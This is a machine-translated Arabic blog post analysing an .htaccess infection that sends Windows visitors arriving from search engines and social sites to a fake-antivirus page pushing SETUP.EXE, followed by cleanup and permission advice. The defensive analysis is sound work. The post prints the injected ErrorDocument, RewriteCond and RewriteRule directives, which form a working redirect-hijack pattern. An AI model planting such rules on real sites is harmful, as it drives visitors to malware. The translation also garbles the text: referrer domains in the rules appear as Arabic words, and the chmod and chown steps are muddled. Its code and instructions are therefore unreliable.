البرامج الضارة / الفيروسات - .htaccess "إعادة كتابة" وإعادة التوجيه

وهناك شكل جديد من الفيروس التي لا أرى أعرف الكثير، وتؤثر مواقع مستضافة على خوادم غير موثوق بها حيث يمكن "رؤية" حسابات المستخدمين / حسابات النطاق الفرعي بينها. على وجه التحديد ، يتم وضع جميع حسابات الاستضافة في المجلد "vhosts"، وحق الكتابة مجلد المستخدم من "vhosts" إلى مستخدم عام ... بواسطة الموزع في معظم المواقف. إنها طريقة نموذجية لخوادم الويب التي لا تستخدم WHM / وحة التحكم.

.Htaccess virus action - هاك هتكس

فيروس تؤثر ملفات . هتكس موقع الضحية. أضفت خطوط / توجيهات إلى توجيه الزوار (تعال من Yahoo ، و msn ، و google ، و facebook ، و yaindex ، و twitter ، و myspace ، وما إلى ذلك من مواقع وبوابات ذات حركة مرور عالية) إلى بعض المواقع التي تقدم "الحماية من الفيروسات". حول مكافحة الفيروسات وهمية، والتي كتبت في مقدمة .

هذا هو كيف يمكن ل . هتكس تتأثر: (لا يمكن الوصول إلى عناوين URL المحتوى في الأسطر التالية)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

ريوريتينجين تشغيل

RewriteCond٪ {HTTP_REFERER}. * ياندكس. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * Odnoklassniki. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * فكونتاكتي. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * التقنية Rambler. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * أنبوب. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * ويكيبيديا. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * مدون. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * بايدو. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * Qq.com. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * ماي سبيس. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * تويتر. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * الفيسبوك. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * جوجل. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * لايف. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * AOL. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * بنج. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * ام اس ان. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * الأمازون. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * موقع ئي باي. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * ينكدين. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * فليكر. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * LiveJasmin. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * سوسو * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * دبل كليك. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * Pornhub. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * أوركت. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * لايف جورنال. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. *wordpress. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * ياهو. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * اسأل. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * إكسايت. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * التافيستا. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * ام اس ان. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * نتسكيب. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * هوتبوت. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * غوتو. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * إنفوسيك Infoseek. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * ماما. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * روابط إلى. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * لايكوس. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * بحث. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * metacrawler. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * بريد. * $ [NC، OR]
RewriteCond٪ {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond٪ {HTTP_USER_AGENT}. *Windows.*
أعد كتابة القاعدة. * Hxxp: //wwww.peoriavascularsurgery.com/main.php؟ H =٪ {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R، L]

{٪ RewriteCond REQUEST_FILENAME}!-F
RewriteCond٪ {REQUEST_FILENAME}!-D
RewriteCond٪ {REQUEST_FILENAME}!. * jpg $ |. * gif $ |. * png $
RewriteCond٪ {HTTP_USER_AGENT}. *Windows.*
أعد كتابة القاعدة. * Hxxp: //wwww.peoriavascularsurgery.com/main.php؟ H =٪ {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R، L]

أولئك الذين يستخدمون WordPress سيجدون هذه الأسطر في الملف . هتكس من بوبليك. وبالإضافة إلى ذلك، فإن الفيروس بإنشاء ملف. هتكس متطابقتان في مجلد الفسفور الابيض بين المحتوى.

*هناك أيضا الحالات التي يحدث بدلا peoriavascularsurgery.com dns.thesoulfoodcafe.com أو عناوين أخرى.

ما يجعل هذا الفيروس.

مرة واحدة إعادة توجيه، واستقبال الزوار بأذرع مفتوحة من قبل الرسالة:

تحذير!
يحتوي جهاز الكمبيوتر الخاص بك على علامات مختلفة لوجود الفيروسات والبرامج الضارة. الخاص بك system يتطلب فحصًا فوريًا لمكافحة الفيروسات!
System سيقوم الأمان بإجراء فحص سريع ومجاني لجهاز الكمبيوتر الخاص بك بحثًا عن الفيروسات والبرامج الضارة.

1 البرمجيات الخبيثة

بغض النظر عن الزر الذي نضغط عليه ، يتم توجيهنا إلى الصفحة "جهاز الكمبيوتر"، خلقت لتقليد تصميم XP. هذا هو المكان الذي تبدأ فيه "عملية الفحص" تلقائيًا ، وفي نهايتها نكتشف "أننا مصابين".

2 البرمجيات الخبيثة

بعد النقر فوق موافق أو إلغاء الأمر، فإنه سيتم البدء بإمكانك تحميلهالملف SETUP.EXE. هذا SETUP.EXE هو مكافحة الفيروسات وهمية التي تؤثر على النظام. تثبيت بعض البرامج الضارة على نشر مزيد من الفيروسات وصلات، وإلى جانب هذه على برنامج مكافحة الفيروسات (مزيفة أيضًا) تمت دعوة الضحية لشرائها.
أولئك الذين اتصلوا بالفعل الفيروس قد استخدم هذا النموذج . ويوصى أيضا لمسح الأقراص الصلبة بالكامل. نوصي كاسبرسكي لأمن الإنترنت أو كاسبيرسكي المضاد للفيروسات.

هذا النوع من الفيروسات يصيب أنظمة التشغيل OS الزوار Windows XP، Windows ME Windows 2000 Windows NT، Windows 98 si Windows 95. حتى الآن لا توجد حالات معروفة للإصابة بأنظمة التشغيل Windows نعم نعم Windows 7.

كيف يمكننا إزالة هذا الفيروس. htaccess الملف على الخادم، وكيفية منع العدوى.

1. تحليل الملفات المشبوهة ورموز محو. لضمان أن الملف لا يتأثر فقط . هتكس هو أفضل تحليل جميع الملفات . بى si . شبيبة.

2. إعادة كتابة الملف. هتكس وأنا وضعت chmod 644 أو 744 مع وصول الكتابة فقط مستخدم مالك.

3. عندما تقوم بإنشاء حساب لاستضافة موقع على شبكة الانترنت في مجلد / الرئيسية أو / برنامج Webroot وهذا تلقائيا بإنشاء مجلد الذي في كثير من الأحيان اسم المستخدم (مستخدم لوحة التحكم، وبروتوكول نقل الملفات، وما إلى ذلك). لمنع الكتابة البيانات ونقل الفيروسات من مستخدم لآخر، فمن المستحسن أن كل مجلد المستخدم لتعيين:

chmod يشار إلى 644 أو 744 ، 755 - 644.
chown -R اسم المستخدم folder_name.
chgrp-R nume_user nume_folder

LS-جميع طرق للتحقق مما إذا كانت مصنوعة بشكل صحيح. يجب أن يظهر شيء من هذا القبيل:

drwx - x - x 12 ديناميكيات ديناميكيات 4096 مايو 6 14:51 ديناميكيات /
drwx - x - x 10 duran duran 4096 مارس 7 07:46 دوران /
drwx - x - x 12 أنبوب اختبار أنبوب الاختبار 4096 يناير 29 11:23 أنبوب اختبار /
drwxr-xr-x 14 express 4096 فبراير 26 2009 express /
drwxr-xr-x 9 ezo ezo 4096 مايو 19 01:09 ezo /
drwx - x - x 9 مزرعة فارما 4096 ديسمبر 19 22:29 مزرعة /

إذا كان أحد ما سبق سيكون userele FTP الملفات المصابةلا يمكن أن ترسل الفيروس إلى المضيف مستخدم آخر. بل هو شبكة الأمان الحد الأدنى لحماية حسابات استضافتها على خادم الويب.

العناصر المشتركة في المناطق المتضررة من هذا النوع من الفيروس.

تعيد جميع المجالات المتأثرة توجيه الزائرين إلى المواقع التي تحتوي على اسم المجال "/main.php؟ s = 4 & ح".

هذا "الفيروس. هتكس"يؤثر على أي نوع من أنواع أنظمة إدارة المحتوى (جملة ، WordPressأو phpBB) أن يستخدم الخ . هتكس

.htaccess Virus Hack & Redirect. هاك وإعادة توجيه الفيروسات.

مؤسس ورئيس تحرير Stealth Settings، من عام 2006 حتى الوقت الحاضر. خبرة في أنظمة التشغيل Linux (خاصة CentOS), Mac OS X ، Windows XP> Windows 10 si WordPress (CMS).

كيف » مكافحة الفيروسات والأمن » البرامج الضارة / الفيروسات - .htaccess "إعادة كتابة" وإعادة التوجيه
اترك تعليق